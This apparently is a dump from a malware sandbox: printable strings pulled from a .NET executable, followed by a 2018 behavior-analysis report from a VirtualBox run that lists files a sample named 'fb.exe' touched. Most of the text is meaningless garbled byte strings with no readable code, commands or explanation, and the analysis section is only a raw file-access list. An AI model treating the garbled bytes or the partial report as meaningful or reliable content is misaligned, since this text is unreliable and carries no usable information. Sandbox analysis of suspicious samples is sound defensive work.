W#:
NcNlN N
ThY@
j|Ic
z%H/l
~UN;]j
N{T
"w!nyG
ZOy}
V5=F
'of%
QLJuo
HJFO
]n:+
_Qg'zLz
7fv[
}!
s9~z
J*i]
9v;&
]-(q
R Kf>b
kh[T3
K/ k3
O_|f`
T$o^
4G,}'_k
?5Qm
)Efp)U:
~lV
I j2
ZW K4
S a m
lfYs
Q\J.
X78K
M fmd
0*M)
h]"f
lV>mO
W =5
$o.B)
T Ym%;
Jm*Q
J:tx=
'9[7T
}9~(
l _
AL<%
Pn.
}gZ,
S9-a
\<1G
Q$1A
S}?=
)n\m**
A1-j
U_Z
`W/mr wP
+ICC4;
>C6u
NGN[NKN
UG~-
VXBSv
978R:
C^Ok
XxrK0
m]#6
4l d
6%}h
p^
}7L,
p=e4}X
~\}i
[eAR
<4ZT`
S^iT
P]5
MJ)>p
\L/Dfea
,(f5
lgv4u!
N N.NJN
E84$
v]&X
n w
zM<Uv")2
1o i
+ANWr.
^$Ns9x
osegSwHemmHPO
?}< aT~
?.AX=
4rz>
\ $b
^4SULBl
X*Mt
d0rAfH
lvH(
M }Ub
g*&
B>b#
D"M ,
.vnu
1+-U8sfw
117Pxt
1{?S
N%N;NVN+N`N"NBNsN,N*NoN NZN N%NkN|
Ka`t!X
s oq
lH1!RqrN;M
-36w
BOT4Ny(B
p)~j
)^}`
wvf
(RNaN
3~}&&
VtYdQnnqx35nwnJ9x
b(_@
cmv?j
{]r{
N$NJN)N
:YM> '5Z
e?5[
WrTU
_u~0
R/bY
^ ]g
get_Message
!This program cannot be run in DOS mode. $
|w*65
4l/V
<&1]o
J(4 kG
Muha
n^4h+
:#(P
A> ?U
@2Oq
B7Z`
xM9
nYZ,
s8V0
)._`
wjpV
;,F,^
;4tg
d%r.}
}z e?G
kby$
L>j9
bi>[q
7 >D
h:]C
WMVy
XK0w
u`\a73dGK
(NVB
"F$qmS
L)S_M
teal
B/`
u/DY
:U!z?M)
@fda
^';.
COWb
a-5s
u/DT
#!TQ
W |
uJp+
1MX;
V^3Gv\
L4(7
F~S )
NwNxNEN9N
HQ #
:N}mj
k#}Q
ox4Md
"GZ]!
%W .
>p:c
J$**
0%ed
$q\n+Gw
N@NYN
aYz)
oy>p
f=#:
i:?e
g7Jv
05W6
LateGet
N!NrN;N1N
P,6X>U
;ufq\
K0X7U
X"$i
:mTWna
9q /
=Zj+
$%aV
8 +c
R{L(
nj?6
GG.|
a/BN@
yL*-
#3%p
qn4;
CO&
oH\E
w?Y&8
/7#X
MH]
w;lna
YEqnxH
gXhJ
j |HdV
{Oul
&b!\
]m b
N<N3N
MdDM4
+}}eo
4^a#
_p }
vq20
3dW{l >
BSJB
H4sz
4Jh&
}5Hq
fsF+
ZLR
~ RM
n-SU
K[ 9l@V_q
Satq/v-
N(NnN
QgYs=
FnAjXUXE2Vab3pOWF4T
jSKmq
nR\S8
?UT
(9a5^] OG$z
P`!D
t;(
qPU&
`]\2
tL}wO
vI^%
%NFee
)f4R
Im&
3Fn^
1`4G
%SM*
/&@A
,k3w
!^@~#
!l{a
3Y&!
H bi
kgXh
VH`m
Kb@~m
r].~
w9#x
B<\gYo7
e7GFgo
co\\{
B&_C
Ku$R
GSY:
WOHs
/9(<u
,4h6|
`<KW}
Y Uuhj=
0KrfO
D>U'
2@k,8Z
xRWc*<
*TpC
.JK]_
FFiF
a,GO
?^`+<
MbTz
&8%Bf
!}\-
'4Gt
>5,lv
Xd]qGB
Zi7A
N*N/N
Mn1
DQEf2
7"q
1<r2
c n\
?IA[/
`L0W
LZ5y
om+;S
V{Bl
1 +2o6
~gM':_
N:NHN
jeg8
!hBr
CH"uB5.
Y)dd
ll}z
?79X
1Dik
^6i
PUy[
,QxqU1x
q=>F9=<
I,eZ
rM<t
+Qp}
H^\T
OhSpq/B)
K*>e
/!q
n7&S
EGc6
w0/KPk\
(5o:;*9
l=uU
1F%7"
~)Gr9k
2Cv-f-
fb
443t
;W<<
bN B*
.T|b
+ TV
S\P.
BN`4
Ln/ F
\l9x
Jdgl{
gLyA|
[*9A
j1pcRuC6VJgC1chx
#qS
Ve[m
ATMx
VGT2
6sSH
C5T$Ob
:_1
{d|b
NdN$N>NCN*N,N
>j @
K=r:(
G"y&
#l>
zzu
,Q]Y
te:"
Ic|8
6O !
gpUH
Ug3
`}5/x)
b"nc
JG(d)
?`SE
q,MP
eL#E@
rx]_^
@uTr
Taz'~
3LPT
~y5N
L8 i
r.&H
)i:G
J[~
>ucuj
"[V:
0>ahRzD,
)lUhM;
-;PgW
S|6
>g%neK
A\#I
xqS4
OpFJ|pK
M/ERU
",7B
4,nv} q
[# Q
S'T9>
d O
$]^&
s$Yey
elq5^
;O N
fVtZQ
D1Cup
Vvs1
'a?Y
}yCi
NON~NXNNNYN
p"=^
eA8 J
59JI
'<R<
@we"
yDJv
>k{fV
f4R<
Pfq P
_"NO
; -!
1U<~
#5 *
1Q xx
/Ra
TWZk
- _<9
;~y:
}^!l&
Z]4d
H Yr
sK d
dK#
U 9,A
PrN?j
1x=s
.m/%Lu
4r2y
*f9
jB'%
~#2
S,@f
NDY]"
mOJ2+
g`a&eu =
M`a~
\o8v
E< ^
dDi3.
?DM
CompilationRelaxationsAttribute
hj[nc
fr .
P 't
2R[
hfyZ
lITd
'AnnJZ
DJ(u
}#@L
l'%]
x} #
oT[:z
tI: I
..d_
}S~7
dH$1J`
ghe^
< fA
4j0=
6)Nq
Jx8CG
EH->
f@=R
NW
]kGy
~p:BU
}A"J
#z O
1`q%2
c6i %
+F=(
U<$?I
RDNi
f{|2!|
F[ _
ey.3hK
F4C|
(qmJ
\2 m}
<d23
j7DM
,%>W=
2s_
qK 5
c#%9
sG{q
[u!|D2&
^BCn/
#thq
<-@,
=_kv
b\ &%
E&0w
]V9l\+eE
Kk|u
, a2
7QK[
I+@;pZ
2K=e$8
eN|{
~'/O
h0o6|l
^LYr
7*hz
fK}/
zW4s
s}~Y
N3N8N=NANBN!N:N
MUOqp
yc]z
kk4.
l^/R
Dw7`
gzJ
OfJ9
0ZNnN3NyN`NUN2NzNJN3N?N7N[N7NHN!N(N%N`N9NMNdNvN
$rFo
--IYO6
Microsoft.VisualBasic
'W>b?
><xL
A$h
%n.P
[I#r
b%CV
=oY1k&)
8|zX
&781
00c*>
0VZO
v/0]akb
j< M
,@-l'
991L
[<Z
e==^
N{^x
5lP#
8LyQ
o il
Mi7Sd
}q hcFw
,9!v
MKTq#
]Bj
svMG'
fx:P
QP.u\
qY@$
iz k%
9VD\5
BOu(p,
^;eT
$N1E
W .
L=qW
PRE!
N]S+
%RsV
E]W$v;>
}al^
j?KD
/u =E
]pea
'Z'~
"y ^
NHt(
c&l
|*hN
HS|9
_x@52
)?~1P
c6[S'
IwJ
Gs@t
USTd^
8m9wo]
uf+CI
O H~
1te+uZ
Ibs=
)O(k
pf |
IR+#
F"~
g9HIT
]^b,
pZEc
mjWP
StringBuilder
o[$PqN
'F4
<#bO{
]Q f`
?.Nu
-t0s{
q+Jx
35md
.=m|
mtLZ
<xVp
mbo`
>B?5^*b
,L1PfU
qK@M
6<np
T9Co&y
ZP;%^
K&pD
?!'5
]gAD
]UAl4n
tY<k
B2N[
6Yw.
$L>sj
]L<8
]N8!
9N`_wdxp
K%]
reHu
N4N3NsN
=[Ou
6$n{
6p0
$0L k}
G[pTr=
".&n
!O I
/BQ+
u0*m
l_Aj
O%x*;
C~m
8#2&
r~\N
I<2'C#4
]y1]
g=@f
DihX
&Ls
%ZB}
^r#%
_WK
gZ<$
{es]
"Vo|n4
g~v6
RrK)
NJ 9
BOKj0
rqd
4\'L
0y4T
*%YiV
SjEP
x]VCdc1
i*U16(?
{#qY
2<Yx
W9{#
fedl
n\l55
h?ok[
EjOZ
#[o;
2fM/r]
k\ F
6J}@Q
s @7
(}!ip
L(|so&
N=Xm5
EP`V
?w/kN
|v l
rs_GQ
=FmU`
H?t
<HJU
Ik SI0
I"3"' h
w`oT
xJ6@=
R33B
&=i;
QST/h
C^*|
}Cm
;ff9
hPZY
`()(
a9.f
<bu%
G0|:
1S3U
.ac
L|e! c3
~# '>(
U%GO
Ng@#
U=}&
iO~
OBdT^
OE-l
WrapNonExceptionThrows
+R)/D
mevi
:d l
q^8D
0QC@&
G |I;}
ol+z
xqS=
Hjq[
BRfP9
`SK^
0@{ZTV#"
Mb Hf
fXC1"
/As
s n+
pgx4
/#/
NhH N
w [+
En[l
;4~U
YV)z
0Yb'd
String
66=&
NuOvL
@5Mh
N:N8N
T]Z^U
VXPd.
tt_e
1ly_
J) J
RW]%
8tWQ
x`]m
m6-@K
IAZ7E
)Y|
(QcP(EM
o Vf
&yC TkL:
Show
4*T+oH
}03
&)Uz
) w}7
akx#9
v"/~
MqfP
6FCp
i 49
.n (}w
L6NHN
G' Qe
-ETw
zc]
i&/a
p o [ u
iYIuo
\5C4
<'S
AfWB
1KJ01
AS f]
dG"7
+&vS
#'9p0B
|0P\9
E nk
Yud5^U
_CorExeMain
L\.:
|(/[b:1$
Rfj
PhFt!#@
L\d6A
N+O
V&d)
'^qb
ty9!%
%+NT
N4NqN*N
:~TW
$f0L
P h#? n
_1
l#39M
CVL=
oac|
$d,W
Jce
9qL/ 1
_:}!M
A.-t
xs8i
i-V/
JIco
o:(
0ND'W
R:RG
:/QQ
U9LZOHdOjAd3UPjKeeP
`u
/42e
02iM
8w /
P)GO
FqND
x?1*
Microsoft.VisualBasic.CompilerServices
b(TQ{
lA^y(\
@2E)
HY_/<-#
(=1A
Kx>g
q ~Eh=u
y.v:
4_.1
v}N:
\K>`V
&cFK2
GiW!
FJ\
hS%Y xi_7
9?H
II9:
@D`09~F
c8D9
[NiA
Vii.h
~d*H
Syl8B
j]G/
'8.ul
M7D^
ParamArrayAttribute
Xh\{
$MI{]Y
<I %I
k]dj
>TdQD[X
/(1HE
{Gpq y
NMNfNSN)N8N
!~xp
9GdeaJ<
qBH
N& yy
dFta
vqY*ZH
-gJgJA
/(rU
WO"y
-~7Xd
Uv/V
'n$;d
(<@Bd
Z"*Z
P}hP
bA4^
'^&vG >
}7S+2Q
8~Qa
d'\.
+QnA
oFe$qdD,L
DwH
NkNBN%NXNxN4N
<\fz
6 (
r(a)
Nj\{
tdd
ZM7P
=mzy
<|g
? XG
5X'+J
xgj&
H[a|\v
R6~<
xyLLU
> x1
L m"
=4KE
%@7F
$h$Q:K
CwR+4]
jDO7
e5QJ
N )
&[0GUxU
;vV[
$~1xH$]f
'dKt
B(Q9g
Y=vW
0cE'
2kG c
[8DU^W
2)'/
I#`v
25N]
VZ,Z
C^7z Y
jE G
EoF
DQ`h
hsDR
A )
~|eB0
Fw@D
~]= +
=2{h^
v-'R
f}hX
H^B9
P9D
:(@zx
~2 {PD
,!O e
Y*z};
lg;2:=G
aEZ!Y^a
n*>QA
CS n
5Lt
s#gd
i5F
[2p
qgsJ8
d09h
L j](
X-r>
8 +3
s^rh
y 07
)QsV a
<8mg
$m@6
4581
hlRp
,k?m
v!)d
0,fp
~mBcL
K^ XY
9 a8
euaO
w0G-
,xF4j
K-g
G3Vg|
( @)
C7iDKg
pDPW
WA(q
cgzh
sLwB
-}oSn"3,,:
iT8>
q2%J
a8C~v
FFqn
wp_tjTh
b@Za
W2l.
#*@m
'rT0
+DvW
~^JL
;fAt
vES
&O^
8B1D~
~7 ;
w]O@$5
k;.1y+J1P2
m98x3[
xMw~/
W[U#
;o2p
h<w~i
:Z7
LkuHU
K.T=
Gn`T
NaN8N
`cK ~
%6iaww
ZwT`
"N=`
"x~H4
$ w#
.yi
@XG
^ 11i
!hc*C7
j!)~
o?^;
e!!M
1o}#
pRO461R%W
dgN /
x8E*
se A
IneN
hE@w`SE^
fd8+4=V
T)S 6o
y4nd
>K+V
YztQ/GQ
34 O
Ukc6BXRRB3cp
4A,U)
lz)~
L.%0
fpMm7u
.{ |
3'yA
mlTA*'!+
X`fK&
Dn13
%u]]b0.{
YEt
(M3U
f$%,Y
d2,
jSp{
L9*
+Ibez
E' ?
K_l4C
zQn9O=}.7
vEv|
f
{oKF0
307>'
>3TF
-Q.t
mQ%aYl
d8gk
9%do
L,Og`
( @G
& ZP
sEKQeNPbVqR1MkV
RX6RC\
;r3Y*
Cm1M|
8;j1
f$$x
s yD
N(NyN=NeN Nld
!
;ZLC:
4!cwp
[-m<
|\(-
hbqc
zk.8
)YN"N-N7NDNGN`NJNRNcN
6I, :
pq4]o
N'NCN
0cjx
J-w&
c@}?
-s2d
7&6^
2Si,
^nUR
Ytyf
W+#I|
-@}
a9 U*
UV2L
nA;~
t:21(
l se=_bA
AI:~
AQNLV
hK-d
YZX8
JGGHlLG8xWOWasY
Vx^k
N`N]NXN
g&w!
Z`"4
uN,0 Z=
OLbK
u*QI4
$nrUf
&)o*
tY @o$
tcaG
*6q`~
by:Sn
i1~f
L0 E+
Si&'
|/AI
Zw+
!228Q
42t oK
=mH<
M8 h
ev/D
@Qu$
DS(NX
_P;?
Mh<#
a(S %t
?/4MR
E9 :
C;DK
\;=i
8 ({
L{<
Tk`Wi
/fIL?
+?$YK
i bX
0RP
1;d'
>d#
T|;
8A.
|EG[
z)z]
(\L2
[!YEwX#
2 L
XYhgK79
(E]&
uetp
<RA|
@B,^I_
@^t6*?
90'+y
[5;i
!]X
=w}w{
eR<Db
FR'^
0 q[
W8vo
vw)u
8z*=K
Append
R<D^
2p PT_S,F
Y27-
{_C!
Sa 4
/bq&4#5
G_x
gB>W
{Ft2
P0|8
_7l~
}<FN%
H#<w
2nI2
ddgn
"kCp
2s#|
wi67
]i7C
Vb!7
Eo}t
ZktGAGE
' f~
] Ra
0q~H&8q
!/,H
4MaA
.| 1m
^Da:S
U08oL
u6yx
d.&Y
HN4X
#Strings
[CB
KPgsm$
C!2$(
IT/fa
vgla
lR#*
q<:7
_ X;q
H&1p
>Q=w
r?>S
+D 9N
xF2p
VGE]o)
9ezG
] &w
+@+i
ce:3
VI:
z Ic*
%Q-Ce
% m1
N\u5
}T3'K
q7xCzd
=9ln
8_5N
h!k_
y,M
3'><
8W|pvt
sMB<
2%.A-
2. "C
ep :(
SAaX
tJ dv
Eig0
;}'@
PGHL
d]qUD
tB Ay1R
]} M
qe|CO\
GI;Q
NEN N2N
6}Ru
+2/A?9T
5 , r
*H|?
NBNGN,N
r/uX%I
S&eK
UrsQ
WW7o-
1(30
K|sX
P2 <
{5-u[~
psu$
EUo9
&P(V
1cx[U
25,w
s<#
|05O
^)d1
"]Oj1
_fB)E2
W x{+
hky
k%Y
)zf:
Iudip_
P9E}
\{eh
./(-;
yb0$=
5*Az
9and
*\d @~)
WB@A
b$>Luyj
J"27
&R7=xT
7Y`@S7.o/
.81T
j>1A}A
8}'G
sxdJ.ppM%
R(0YY
NdNcNHN
ZR9/
0$hP
~ !C
OW*:
)\4W
hZ49RzNISlYs1V0318e
3d]4H3
xi'b#
emSoFHB
G07h
qTs\
SXmn
2*na
2:;|
3';Og
u`i9
}I4f
EV+.
G@Dg{:
xG-~)S
OA&*c
s2MgoO
CrPJ1
qo+K
RM-Sif
}7-V
x4cX$
j<4
vmN#CI
g^O7
OBx
?=e4
o B"F
F_hq
*z"-
xFn2z
Jum&
V31
#Vc
R{Ji)*t
\\HZS-
K^
}^QU
Tk7plUFjP4afKir
TA+
tvkO
NC}`
NWNiNrN
fEFJ
!V0s
>K8{
CK"]~nse
o5V>
z?x[_
uO=g
W;=E0
I95t
K3<gd
&SNO
6xY$D
Fe[yC
rgJ_
4lp7
g3'O
B0vm
Kxi5
T0fZ
RoZl
)if:G
V8.Z
xYjJ
[4,XLY
x ed
/ NJ
,F2=
N N*,
!%6>Z
N>NiN/N
LT,]
_?@
OEH)
-&';
:!R
mnZR
G&Dk
v2.0.50727
% SD
Ja|Y0
(1D
:F-0V
f>EV
n=>$"1
3l+ 8
q3*Y
/|Bf
2er``
U;1 =
TLt"
YWesi
K| ]
%#TcM
-L$dh~
dk!
>?0/
M+F5
a3-K
8^v!
5A'(
O.;N
%V)V#t*p
N`ND
u[=5
b]' 5]
z7g(
L13+D
{f.(
n S
C;y?
+\B
J'|R8
]HC*
3/"t#
*#sN
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
va/
mp
{d\.
odGebI0KDnQ
~n6c (v
Zt+M
H1dv
~$ wW
X{ ~
R@cL
?,
"}%'L
yin.
n]URi8
4-GCl
*wa?
_tsU4
8cD%-
^[u=
y{N#R
" Bw
ZeFr
E_!S
MO>s
DEP1
)4)&
`dlAI
2adI+
[{Vo
A@"2
1l.z'w
{\y}
cbu=
t0.=
L Ca
vKFtc1
@B BEPA
&q ~0
*.s_
O a
F)0 h
& sZ
ablR
mZ)b
E(\a
6/ %
f=)i
I_qAvsC'
lr<x
V"eqN
I#+g
"d `
| 4\o
>-Su
wMeg
*2}n_
!\KGc
0.BU
;9+Q?c~
yYDx
H `i
ROIt4Mf
NxYH
|?%K
["wQ
{Y,N
pu"B
Vgk"F
OCtt
_hH{\?
8Oz3/h,
J?c"6
[P.[
UPN
1fvnu
#UNw
CI[K
_$[bL
=Q Z
Co>D
`:BF
{Kp"
i(-.Y
u0G
?YE d
t&>'
D,8)O
:KSH
4>5&a
fE qN
q"?<
u[R
AJwEL
% ZW
fPt$
Ef!.
3S-c#
9 P%<
YY;o
+b ~(
g)xN
- eQ
K@D#
~@NO0
W[{C3
NkN!N
(T!1
m|T1
+ui
wP>!1f
qOH0
jFP
mIB44
mJ~l
FV1]y
K7D&(
C6qPq
RXN5
`W7*
1*).
kjl.
]:R
]M^
h!Ze4zf
qvfi
|XW
^*%o
>0-e
:: *&
b6vc
v?]/%$
74.!f
*ISxI
C~^>
>;Of
o;xB
QC0&2-
System.Runtime.CompilerServices
@; :t
?0Y,
na^pQ
*w<)
@q_D'ps
js:O
`CkS
Y`
DUZ@x
leg8?
k 9V
y}Mi
l0\i
:#|z
5|IW
D -y7
r?CV
yi7U-
EAG?
#We@Hn`
$ntG
jok
{l%7?-H
p'
^Bb,5
uw^`t
Dd'3G
4`NwNcNDN
bS@q
$ko'
NEE-T
sb z
[~=L
69/d
A \s
*?='
Z:G0
!t Vj
`L"0s
27Ykw
@ ;0
~UX\
FK`,
-,l/
a!N1
P/ j:=a
GR3Gu
rJP9
)~CR
rB d
eBbmu
M&KU
$Td
=jR0
Ha,/
^ F=
AG2:
0MQ<
]#O->
^&B%m
PqQJ
L,NHN9N
6yw~
CAx3
4 rL
@ iP
E{/}
e KU
!E{5g'
Z}$F>
C;iE
q_L
9H~QW
N~NYNkN=N]N8N
=UjQ
# {7
v6gs
dc#k
z+2Z
Ye`&
suC
"[Q =Y
System
P5Go5-x2a`
xTOC !5
N{NtNfN(N
qyq(
+ c>gV
's1j
^!*zH
UWvU
=(Gg
P2GHu
aBPLx
\!0
yjr5
=+0p
lOoOs
uC0x
:(Oqi
x-ht
>)1|
o
c=:$D
j 9(t
* |!Y
jP2zy
*CN"N_NjN
U+T`
h~ ^B
oz=cC
d$JR[
0'\_
BmCS
coo @
rz@lj-
AXzs
Tskl
#Blob
#f`H4
rBM(
inGl
/x51
];Vw
4j+42r
fb[EB
*"0A
N_N5NxN
@8P3D
GmbPlF
"wA/
4<+q
%Xlz0
PT@4eN
cS M@
3OgN
|!;7
F"/xIJ
F5gc{Cmm
> MG
]b!Fq5
:.B.
BKi->
A /$
W_<"
LC& $
_0iu?4
7ZQw
T `
zJobiXO<
skH ;
\)?
sYX2
+=eYO
$]dtp
[4$I
%L+H
sWG9s
L{,)f
^x}Z
vk?fK
s{L+
*W40@
Z \^f)
<?y5&
!vHK
y+Sr.'N
i8Y>
:J+K
0_yc
JvI9(4
Jvi
n. gW
P}v_
5+z]
m8FDG
2R4_
\2tV|
5+h.
L4T
U3[&
7>|~
-a9n
z:WLU3n
c &;
VM}=
sr1Wp'
tBu"h9
M)ex
g&jcX
Db}Y%
:JFb
s* Z6
<1C{
Ez ~sR
Qx<M
U[
3%Mi
ATi{
j`%S
NhN6NlN
v$Vk2S?
Ms:8R)
FT~,
%y(%:
n\dP
vvU
,rxc
VV>g{w
,-tS
Hhgz#
[Z#?
9>%IN `wk
?Vl@
Y/c-
gd76n
OOoaLG#
U12FAfu2v6atv
lC:e
{L5f U
I$gF
N#N!N=N N
Nr0p]
^$rM
9bI{Z%
iZ #
hSw0\@xY
~jxD
gaG1
1K~[A:
w@Rh
o 5s
B3@x
Z u#N@F
=97p
j'nO
A+fX
m?lo
~LKh
p5iO
uCdGUYsLAzWEY
# qsO
092u!
B +R
,qp
rA_8
<#B"
0 :z
NHNnN
0q4y
m fK
;u=oD
qdB
d?c
HygdA!
7d6K
n`>|
EW0O
3ncB
[8Neb7
Vm9 Kf
_?9#
]~U<>
g]_k
l3R@
@Qw3
wx*}ph
:)iU
z]+fs\g
O_cxX
[.8#7O9
(NGE
Q9qd
:w*
=[G}
z4 #
^ElNdj
ga '
nGy&
CvQ9
[+ly
a;j_
I`y#
hGe&pk
Df-;
$PD[
=d2K+
$4"k
a3XA
'%%h
xegF
+ D+\
,tX
`6v)
[yn\
sQ^m#
FrM_
SoRn
=Q} $P
NfN,NzN/NxN/N:N
TOO7( a
NyN.N'N1NlNqN3NuNUN
b/'W
X3s*
>y,7
dDm|~ 3
>58|
!m)!
y;?7y
`8~B V
mSN\t
]/:G
Ek
H(9H
.P{z}
r9
5[}zB
{U7+
D/6,6
u}i!
1bx
$L3v
$5@)
De'ut
#dTN
sH+\l
6W3q
Lr<&
lMBV
T<jiZ
`l7@u
^a )
o8ky
Wpa\
PshC
yH>g
tG$3
%SV
2 3gK
= PO
rT{_
]]d8
0hlf
dMG
>_Z+
/Cu(
j7Sn
e\+sY
. Jx
{}g{f
\ ,/
_3pS
}8g/,
}5:O
ug>z
_>}Z@-
chN F{
`mk B
Bq{uq*~d
dy3#
"aIU
s!lI
N|N/NsN N}N
Ux<5o
JC0nE
G 8G
6=ad
iC
@ .9
[ /zw
^Z S2]
IXv%
72!5
\K~rJ
mscoree.dll
n =]
in<yv
B< 6|3C
r$USm
}?th
ekS%D
_r5x2aY
6&d)AG
\ &K%
! N$
!xTC
Mf+1E(
:a\"
=ocr
-|L}fV
_ hw
6)hg
~lOP_
=h/R
1,R@Ch
[[`9
yjP
ORm]Kn
\ ^[
7:hV
B`c|9
Hjo|
z/Hp
1| aq
d>F[
} 2
Fu3Aa
Du[+PnC
kOdJ
ID\!
g8W$
l{}>
System.Windows.Forms
z@iSW
=V?
D%Lt
%qfp
H~%@
'H QC~
-eIJ
)*X6_~
2>P T
|jFY
k4bx
N3N8N9N7NHN}N5N
6EQg
%Ub0
P).z
}#^S*<
D0:z
2NZ
]TP8
e Shz
C0Y2
,m6.
tB{k]j
?j:]
OGnQ
PCMa
OWvUU
P{P
2Nu2
<BHH
Ab :
]_<]
vM@:n
I-Kq2?
NW25
v\2_
K `
r7Dv
|O(uIG[,
|WseG
e"ve
1 o#{
$4k;
VB>)
C,S*
Ovu4
u~ @
NAuG
hXBC
r >|
eQJ7
FP4u
ymnv(
.,z4a5e
;i'f
1'}V
o v%
vw{v
f |!
QFp!{
koI0
v{;j
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

11 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01b_64 Seven01b_64 VirtualBox 2018-03-15 15:10:19 2018-03-15 15:13:09 170

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.config
C:\Users\Seven01\AppData\Local\Temp\fb.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\fb.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\fb.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncvmx.resources\ncvmx.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources\ncvmx.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ncvmx.resources\ncvmx.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
